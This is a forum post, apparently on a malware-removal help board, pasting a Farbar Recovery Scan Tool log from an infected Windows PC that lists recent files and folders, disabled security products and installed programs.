00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg20142014-08-16 17:04 - 2014-08-16 17:05 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers2014-08-15 20:57 - 2014-08-16 12:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc2014-08-15 20:56 - 2014-08-16 09:22 - 00000000 ____D () C:\Program Files\DriverUpdate2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe2014-08-15 13:12 - 2014-08-15 13:13 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe2014-08-15 13:04 - 2014-08-15 13:21 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe2014-08-15 11:12 - 2014-08-15 11:13 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe2014-08-15 11:11 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled2014-08-14 18:20 - 2014-08-25 09:20 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job2014-08-14 18:20 - 2014-08-20 23:44 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk2014-08-14 18:20 - 2014-08-20 23:44 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 52014-08-14 18:19 - 2014-08-25 09:19 - 00000000 ____D () C:\Program Files\Glary Utilities 52014-08-14 18:19 - 2014-08-23 11:16 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag2014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft2014-08-14 18:19 - 2014-08-04 03:06 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe2014-08-14 18:19 - 2014-07-18 03:11 - 00016064 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\BootDefragDriver.sys2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe2014-08-14 18:15 - 2014-08-14 18:16 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe2014-08-14 17:37 - 2014-08-14 17:40 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes2014-08-13 21:28 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E12014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod2014-08-13 20:51 - 2014-08-13 20:52 - 00000000 ____D () C:\Program Files\QuickTime2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a4952014-08-12 18:02 - 2014-08-22 16:10 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a4952014-08-12 17:58 - 2014-08-15 03:47 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir2014-08-12 16:53 - 2014-08-22 21:40 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu2014-08-12 16:51 - 2014-08-25 09:16 - 00000000 ____D () C:\ProgramData\IrfuqApivh ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-08-25 09:47 - 2014-08-23 16:54 - 00000000 ____D () C:\FRST2014-08-25 09:47 - 2014-07-18 00:39 - 01989969 _____ () C:\Windows\WindowsUpdate.log2014-08-25 09:44 - 2011-12-22 18:52 - 00001356 _____ () C:\Users\savas.kyriakidis\AppData\Local\d3d9caps.dat2014-08-25 09:35 - 2014-08-23 16:30 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys2014-08-25 09:23 - 2006-11-02 06:33 - 00694332 _____ () C:\Windows\system32\PerfStringBackup.INI2014-08-25 09:20 - 2014-08-14 18:20 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job2014-08-25 09:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Program Files\Glary Utilities 52014-08-25 09:18 - 2008-08-06 12:35 - 00000276 _____ () C:\Windows\Tasks\RtlNICDiagVistaStart.job2014-08-25 09:17 - 2014-08-22 16:12 - 00039662 _____ () C:\Windows\PFRO.log2014-08-25 09:17 - 2006-11-02 09:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT2014-08-25 09:17 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A02014-08-25 09:17 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A02014-08-25 09:16 - 2014-08-12 16:51 - 00000000 ____D () C:\ProgramData\IrfuqApivh2014-08-25 09:16 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\system2014-08-25 09:15 - 2006-11-02 09:01 - 00032640 _____ () C:\Windows\Tasks\SCHEDLGU.TXT2014-08-25 08:26 - 2014-08-23 16:30 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk2014-08-25 08:26 - 2014-08-23 16:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware2014-08-25 08:26 - 2014-08-23 16:30 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware2014-08-25 08:17 - 2014-08-22 13:25 - 00000850 _____ () C:\Windows\setupact.log2014-08-24 15:46 - 2014-08-24 15:23 - 00000000 ____D () C:\ComboFix2014-08-24 15:45 - 2014-08-24 15:45 - 00046297 _____ () C:\ComboFix.txt2014-08-24 15:45 - 2014-08-22 15:52 - 00000000 ____D () C:\Qoobox2014-08-24 15:40 - 2006-11-02 06:23 - 00000215 _____ () C:\Windows\system.ini2014-08-24 15:38 - 2011-12-29 11:34 - 00000000 ____D () C:\Windows\ERDNT2014-08-23 16:48 - 2014-08-22 14:00 - 00000000 ____D () C:\ProgramData\HitmanPro2014-08-23 16:30 - 2011-03-14 18:46 - 00000000 ____D () C:\ProgramData\Malwarebytes2014-08-23 14:45 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\schemas2014-08-23 14:32 - 2011-03-14 18:43 - 00000000 ____D () C:\Windows\pss2014-08-23 14:22 - 2006-11-02 07:18 - 00000000 ___RD () C:\Users\Public2014-08-23 14:09 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis2014-08-23 14:09 - 2011-02-10 21:08 - 00000000 ____D () C:\Users\Rita2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt2014-08-23 11:53 - 2014-08-23 11:51 - 00000000 ____D () C:\AdwCleaner2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT2014-08-23 11:16 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag2014-08-23 11:05 - 2014-08-23 11:02 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy2014-08-22 21:40 - 2014-08-22 17:05 - 00000000 ____D () C:\VIPRERESCUE2014-08-22 21:40 - 2014-08-12 16:53 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu2014-08-22 17:13 - 2012-05-16 21:52 - 00000000 ____D () C:\temp2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK2014-08-22 16:10 - 2014-08-12 18:02 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a4952014-08-22 15:42 - 2014-08-22 14:32 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy.BackupBySpybotPortable2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps2014-08-22 14:15 - 2011-12-22 20:05 - 00000000 ____D () C:\ProgramData\AVAST Software2014-08-22 13:54 - 2014-08-22 13:41 - 00000000 ____D () C:\Windows\dwrcs2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log2014-08-21 00:06 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Google2014-08-20 23:44 - 2014-08-14 18:20 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk2014-08-20 23:44 - 2014-08-14 18:20 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk2014-08-20 23:39 - 2008-08-06 12:41 - 00000000 ____D () C:\Program Files\Google2014-08-20 20:00 - 2009-06-10 23:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexmark Z700-P700 Series2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft2014-08-19 18:12 - 2014-08-20 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys2014-08-17 17:23 - 2014-08-16 17:57 - 00000000 ____D () C:\ProgramData\AVG20142014-08-17 17:23 - 2011-07-10 20:09 - 00000000 ____D () C:\$AVG2014-08-17 16:31 - 2011-07-10 19:21 - 00000000 ____D () C:\ProgramData\MFAData2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe2014-08-16 18:01 - 2011-07-10 19:25 - 00000000 ____D () C:\Program Files\AVG2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg20142014-08-16 17:05 - 2014-08-16 17:04 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc2014-08-16 12:05 - 2014-08-15 20:57 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers2014-08-16 10:06 - 2012-10-02 18:32 - 00000000 ____D () C:\Program Files\HTC2014-08-16 09:27 - 2008-08-06 12:49 - 00000000 ____D () C:\Program Files\Citrix2014-08-16 09:22 - 2014-08-15 20:56 - 00000000 ____D () C:\Program Files\DriverUpdate2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers2014-08-15 20:41 - 2012-10-02 18:45 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Htc2014-08-15 19:55 - 2008-08-06 12:37 - 00000000 ____D () C:\Program Files\Microsoft Office2014-08-15 17:56 - 2006-11-02 08:47 - 00267048 _____ () C:\Windows\system32\FNTCACHE.DAT2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe2014-08-15 13:26 - 2011-06-17 17:39 - 00058896 _____ () C:\Windows\system32\GDIPFONTCACHEV1.DAT2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe2014-08-15 13:21 - 2014-08-15 13:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer2014-08-15 13:13 - 2014-08-15 13:12 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe2014-08-15 13:01 - 2012-01-24 17:09 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\LogMeIn Rescue Applet2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe2014-08-15 11:13 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe2014-08-15 11:12 - 2014-08-15 11:11 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe2014-08-15 03:47 - 2014-08-12 17:58 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 52014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe2014-08-14 18:16 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe2014-08-14 17:40 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe2014-08-13 23:07 - 2013-06-10 19:17 - 00002463 _____ () C:\Users\Public\Desktop\Transporter.lnk2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes2014-08-13 21:31 - 2014-08-13 21:28 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E12014-08-13 21:31 - 2011-12-24 11:26 - 00000000 ____D () C:\Program Files\iTunes2014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod2014-08-13 21:28 - 2008-09-02 12:28 - 00000000 ____D () C:\Program Files\Common Files\Apple2014-08-13 21:02 - 2008-09-02 12:28 - 00000000 ____D () C:\ProgramData\Apple2014-08-13 20:52 - 2014-08-13 20:51 - 00000000 ____D () C:\Program Files\QuickTime2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime2014-08-13 20:41 - 2013-04-22 21:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud2014-08-13 20:18 - 2008-08-06 12:41 - 00000000 ____D () C:\ProgramData\Google2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a4952014-08-12 17:13 - 2011-08-28 07:57 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\ALL Folders2014-08-12 17:09 - 2011-08-28 08:01 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\Desk Top Stuff2014-08-04 03:06 - 2014-08-14 18:19 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\explorer.exe => File is digitally signedC:\Windows\system32\winlogon.exe => File is digitally signedC:\Windows\system32\wininit.exe => File is digitally signedC:\Windows\system32\svchost.exe => File is digitally signedC:\Windows\system32\services.exe => File is digitally signedC:\Windows\system32\User32.dll => File is digitally signedC:\Windows\system32\userinit.exe => File is digitally signedC:\Windows\system32\rpcss.dll => File is digitally signedC:\Windows\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-08-25 09:24 ==================== End Of Log ============================ Link to post Share on other sites More sharing options...
jjoyner1985 Posted August 25, 2014 Author ID:871052 Share Posted August 25, 2014 Addition Additional scan result of Farbar Recovery Scan Tool (x86) Version:23-08-2014Ran by savas.kyriakidis at 2014-08-25 09:48:44Running from G:\Boot Mode: Normal========================================================== ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Microsoft Security Essentials (Disabled - Up to date) {108DAC43-C256-20B7-BB05-914135DA5160}AV: AVG Internet Security 2011 (Disabled - Up to date) {5A2746B1-DEE9-F85A-FBCD-ADB11639C5F0}AS: AVG Internet Security 2011 (Disabled - Up to date) {E146A755-F8D3-F7D4-C17D-96C36DBE8F4D}AS: Microsoft Security Essentials (Disabled - Up to date) {ABEC4DA7-E46C-2F39-81B5-AA334E5D1BDD}AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}FW: AVG Firewall (Disabled) {621CC794-9486-F902-D092-0484E8EA828B} ==================== Installed Programs ====================== (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) Update for Microsoft Office 2007 (KB2508958) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version: - Microsoft)32 Bit HP CIO Components Installer (Version: 3.1.1 - Hewlett-Packard) Hidden6500_E709_eDocs (Version: 1.00.0000 - Hewlett-Packard) Hidden6500_E709_Help (Version: 1.00.0000 - Hewlett-Packard) Hidden6500_E709a (Version: 50.0.165.000 - Hewlett-Packard) HiddenAcrobat.com (HKLM\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 2.0.0.0 - Adobe Systems Incorporated)Acrobat.com (Version: 2.0.0 - Adobe Systems Incorporated) HiddenActivClient CAC x86 (HKLM\...\{1BE8806A-84F8-4655-A381-0D5524430944}) (Version: 6.2 - ActivIdentity)Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.2.0.2070 - Adobe Systems Incorporated)Adobe AIR (Version: 3.2.0.2070 - Adobe Systems Incorporated) HiddenAdobe Flash Player 11 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 11.0.1.152 - Adobe Systems Incorporated)Adobe Reader X (10.1.2) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.2 - Adobe Systems Incorporated)Akamai NetSession Interface (HKCU\...\Akamai) (Version: - Akamai Technologies, Inc)Any Video Converter 3.0.1 (HKLM\...\Any Video Converter_is1) (Version: - Any-Video-Converter.com)Apple Application Support (HKLM\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)Apple Mobile Device Support (HKLM\...\{941B4CE7-3F5D-443E-A8B7-56A420D2EAFD}) (Version: 7.1.2.6 - Apple Inc.)Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)ATI Catalyst Control Center (HKLM\...\{055EE59D-217B-43A7-ABFF-507B966405D8}) (Version: 2.007.0731.2233 - )AVG 2011 (HKLM\...\AVG) (Version: 10.0.1416 - AVG Technologies)AVG 2011 (Version: 10.0.1388 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.1390 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.1391 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.1392 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.1410 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.1416 - AVG Technologies) HiddenAVG 2011 (Version: 10.0.2109 - AVG Technologies) HiddenBonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)bpd_scan (Version: 3.00.0000 - Hewlett-Packard) HiddenBPDSoftware (Version: 50.0.165.000 - Hewlett-Packard) HiddenBPDSoftware_Ini (Version: 1.00.0000 - Hewlett-Packard) HiddenBrowser Address Error Redirector (HKLM\...\{62230596-37E5-4618-A329-0D21F529A86F}) (Version: 1.00.0000 - Dell)BufferChm (Version: 120.0.194.000 - Hewlett-Packard) HiddenCatalyst Control Center Core Implementation (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Graphics Full Existing (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Graphics Full New (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Graphics Light (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Graphics Previews Common (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Graphics Previews Vista (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Chinese Standard (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Chinese Traditional (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization French (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization German (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Hungarian (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Italian (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Japanese (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Korean (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Polish (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Portuguese (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Spanish (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Thai (Version: 2007.0731.2234.38497 - ATI) HiddenCatalyst Control Center Localization Turkish (Version: 2007.0731.2234.38497 - ATI) HiddenCCC Help Chinese Standard (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Chinese Traditional (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help English (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help French (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help German (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Hungarian (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Italian (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Japanese (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Korean (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Polish (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Portuguese (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Spanish (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Thai (Version: 2007.0731.2233.38497 - ATI) HiddenCCC Help Turkish (Version: 2007.0731.2233.38497 - ATI) Hiddenccc-core-static (Version: 2007.0731.2234.38497 - ATI) Hiddenccc-utility (Version: 2007.0731.2234.38497 - ATI) HiddenCCleaner (HKLM\...\CCleaner) (Version: 4.13 - Piriform)Dell Best of Web (HKLM\...\{C39A4E1F-9AF1-4FE1-A80E-A5B867FABB42}) (Version: 1.00.0000 - Dell)Dell DataSafe Online (HKLM\...\{4D3C9F4B-4B7D-4E5D-99B9-0123AB0D51ED}) (Version: 1.0.21 - Dell, Inc.)Dell Dock (HKLM\...\{F6CB42B9-F033-4152-8813-FF11DA8E6A78}) (Version: 1.0.0 - Dell)Dell Getting Started Guide (HKLM\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)Dell Support Center (HKLM\...\{E3BFEE55-39E2-4BE0-B966-89FE583822C1}) (Version: 2.1.08060 - Dell)Dell-eBay (HKLM\...\{B935C985-A17F-484B-8470-09E4FC27DC26}) (Version: 1.00.0000 - Dell)Destination Component (Version: 110.0.0.0 - Hewlett-Packard) HiddenDeviceDiscovery (Version: 120.0.194.000 - Hewlett-Packard) HiddenDocMgr (Version: 120.0.000.000 - Hewlett-Packard) HiddenDocProc (Version: 12.0.0.0 - Hewlett-Packard) 